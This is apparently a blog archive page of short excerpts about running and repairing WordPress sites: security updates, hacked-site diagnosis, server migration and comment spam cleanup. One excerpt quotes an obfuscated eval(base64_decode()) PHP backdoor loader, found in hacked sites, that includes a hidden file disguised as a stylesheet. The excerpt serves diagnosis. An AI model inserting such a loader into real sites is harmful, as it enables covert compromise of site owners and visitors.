If you weren’t already aware, the gang at WordPress just shipped a pretty critical security update. In fact, it’s kind of a big deal. So much so that I went around and patched all my sites the second their update on the matter hit my phone. Since I’ve put a lot of energy into helping…

I’ve been seeing this code crop up a lot in some of the recent WordPress hacks that I’ve had to diagnose: < ?php /**/eval(base64_decode(‘aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3VzZXIvZG9tYWluLmNvbS93cC1pbmNsdWRlcy9qcy90aW55bWNlL3RoZW1lcy9hZHZhbmNlZC9za2lucy93cF90aGVtZS9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==’)); ?> Most folks with this issue have a problem with “wp-login.php” returning a blank page for users trying to get into “wp-admin” — so if you’re seeing that, it may be…

Yesterday, I quietly switched this site over from its old Apache server to the much more lightweight combination of nginx + XCache.  As someone who has worked with Apache servers for roughly 14 years now, the thought of moving my personal site to a server environment that I didn’t know how to troubleshoot in great detail was terrifying.…

After examining a customer’s 150,000+ row wp_comments table at work yesterday, I realized that they’d managed to let WordPress approve a massive amount of spam.  Since there was no way I was going back thru all of that by hand, I knew that I had to come up with something clever. Fortunately, running your already…

Have you recently found yourself editing a post on your WordPress install only to find yourself facing the following prompt? The server at Magic requires a username and password. Well my friend, you’ve been hacked.  Apparently this has something to do with the cross-site scripting (XSS) bug addressed with the WordPress 2.8.2 and 2.8.3 updates.…

While hacked sites happen, the hacks are fairly benign.  Normally, folks with hacked sites see a few spam links at the bottom of their pages.  That sort of thing can normally be cleaned up with an upgrade.  When I have to deal with them, it also involves a rap on the knuckles and a lecture on the…

Sorry about the bit of downtime this morning and afternoon, folks! I’ve been trying to spread the hosting for my domains across a few users and I managed to take down my site in the process. Apparently I forgot about the quirks involved in running WordPress under mod_php. D’oh! Things are back up now tho…